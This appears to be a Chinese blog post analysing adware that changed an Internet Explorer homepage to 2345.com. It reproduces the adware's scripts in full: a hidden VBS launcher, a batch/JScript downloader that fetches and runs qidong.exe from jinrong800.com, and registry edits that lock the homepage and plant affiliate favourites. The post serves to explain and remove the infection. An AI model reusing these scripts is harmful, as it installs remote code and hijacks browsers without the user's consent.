流氓软件导致主页被篡改成2345.com的分析，包括解决方法

如果您没有闲心看完整篇帖子而仅仅是为了寻求解决方法，请直接看最后

    今天老妈用电脑升级个软件，结果带进来个不知什么东西，把我主页给改成了臭名昭著的2345.com，开始没在意：改了就改了吧，我再改回来吧。
    当然，直接把主页改成about:blank肯定是没戏的，不过我也试了一下：万一好使呢然结果不出所料的不好使。
    再看一眼360安全卫士的锁定主页——居然还是空白页！解开锁定再锁定上也没用，这不得不说是360失败的地方……
    不过这样也确定了，那就是流氓插件绑定的问题了。这个时候如果去注册表说不定会好使，不过有了360，那就用360清理插件吧，我也懒得自己去找注册表……【附：注册表关于IE主页的键值：HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain中的StartPage，直接修改成想要的主页就可以】
    清理之后，不出所料有一个差评插件，清理之！之后按照提示重启
    可是重启之后发现：NANI是不好使次清理之！这次就不要重启了，这时发现：主页已经被改回到正常的空白页了，说明360的清理是有效的，可是为什么重启之后又回来了呢个时候就可以确定，这家伙在启动项里做了手脚。Win（就是键盘上那个微软的标志，一按会拉开开始菜单的那个按键）+R，输入msconfig，查看启动项：
    发现他了！一个叫做kqidong.lnk的启动项，目标指向C:PROGR~1qidongqidong.vbs，这里就要解释一下：如果用过DOS（不是那个CMD批处理，就是DOS系统）的童鞋都会知道，当一个文件夹在电脑中的名字太长时，就会显示为“前几个字母+~+数字编 ”的形式，这样目标就确定了：C:Program Filesqidongqidong.vbs这个时候其实问题就算是解决了，把这个文件夹C:Program Filesqidong删除肯定就没问题了，可是拥有求知欲的人永远是蛋疼的，我点了进去：
    因为我的电脑设置成了不隐藏系统文件和显示所有文件和文件夹，所以我很轻松的看到了里面所包含的东西：kqidong.zip、qidong.bat、qidong.exe、qidong.vbs、xiazai.bat，其中qidong.exe是winrar 自解压格式，正好我也懒得反编译；我只扫了一眼就确定了：这个东东一定是中国人弄得！（因为用的是汉语拼音……

2. set Cleaner=createobject(“wscript.shell”)
3. Cleaner.run “qidong.bat”,vbhide
4. Cleaner.run “xiazai.bat”,vbhide

2. echo=1/*>nul&@cls
3. @echo off
4. call :http “http://www.jinrong800.com/baiduguangjia/qidong/qidong.exe” “C:Program Files”qidongqidong.exe”
5. @echo
6. start “” “C:Program Files”qidongqidong.exe
7. :http
8. echo Source:      “%~1”
9. echo Destination: “%~f2”
10. echo Start downloading. . .
11. cscript -nologo -e:jscript “%~f0” “%~1” “%~2”
12. echo OK!
13. goto :eof
14. */
15. var iLocal,iRemote,xPost,sGet;
16. iLocal =WScript.Arguments(1);
17. iRemote = WScript.Arguments(0);
18. iLocal=iLocal.toLowerCase();
19. iRemote=iRemote.toLowerCase();
20. xPost = new ActiveXObject(“Microsoft”+String.fromCharCode(0x2e)+”XMLHTTP”);
21. xPost.Open(“GET”,iRemote,0);
22. xPost.Send();
23. sGet = new ActiveXObject(“ADODB”+String.fromCharCode(0x2e)+”Stream”);
24. sGet.Mode = 3;
25. sGet.Type = 1;
26. sGet.Open();
27. sGet.Write(xPost.responseBody);
28. sGet.SaveToFile(iLocal,2);

复制代码
    看不懂关系！联系那个文件名和几个 址和地址我们就可以断定：这是用来下载那个自解压文件并解压的，那我们去看看那个自解压文件qidong.exe：右键——用Winrar打开，里面仅仅有着一个qidong.bat，在右面提示着

2. ;下面的注释包含自解压脚本命令
4. Silent=1
5. Overwrite=1

2. %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a
3. cls
4. ::设置主页并锁定
5. @REG ADD “HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shellOpenHomePageCommand” /ve /t REG_EXPAND_SZ /d “C:Program FilesInternet Exploreriexplore.exe http://www.2345.com/0688” /f   
6. @reg add “HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain” /v “Start Page” /d “http://www.2345.com/0688” /f   
8. ::添加快捷方式到收藏夹
9. @echo off&setlocal enabledelayedexpansion
10. REG QUERY “HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell Folders” /v Favorites >%Temp%Favorites.txt
11. for /f “skip=2 tokens=1,2*” %%i in (‘find /i “Favorites” %Temp%Favorites.txt’) do (
12. echo [InternetShortcut] >>%%k2345 址导航.url&echo URL=”http://www.2345.com/0688″ >>%%k2345 址导航.url&del /f /s /q %Temp%Favorites.txt>nul
13. )
15. @echo off&setlocal enabledelayedexpansion
16. REG QUERY “HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell Folders” /v Favorites >%Temp%Favorites.txt
17. for /f “skip=2 tokens=1,2*” %%i in (‘find /i “Favorites” %Temp%Favorites.txt’) do (
18. echo [InternetShortcut] >>%%k 什么电影都能搜索-你懂的.url&echo URL=”http://www.ks888.net” >>%%k 什么电影都能搜索-你懂的.url&del /f /s /q %Temp%Favorites.txt>nul
19. )
22. @echo off&setlocal enabledelayedexpansion
23. REG QUERY “HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell Folders” /v Favorites >%Temp%Favorites.txt
24. for /f “skip=2 tokens=1,2*” %%i in (‘find /i “Favorites” %Temp%Favorites.txt’) do (
25. echo [InternetShortcut] >>%%k1淘宝热卖.url&echo URL=”http://www.taobao.com/go/chn/tbk_channel/channelcode.phpid=mm_10836206_0_0&eventid=101329″ >>%%k1淘宝热卖.url&del /f /s /q %Temp%Favorites.txt>nul
26. )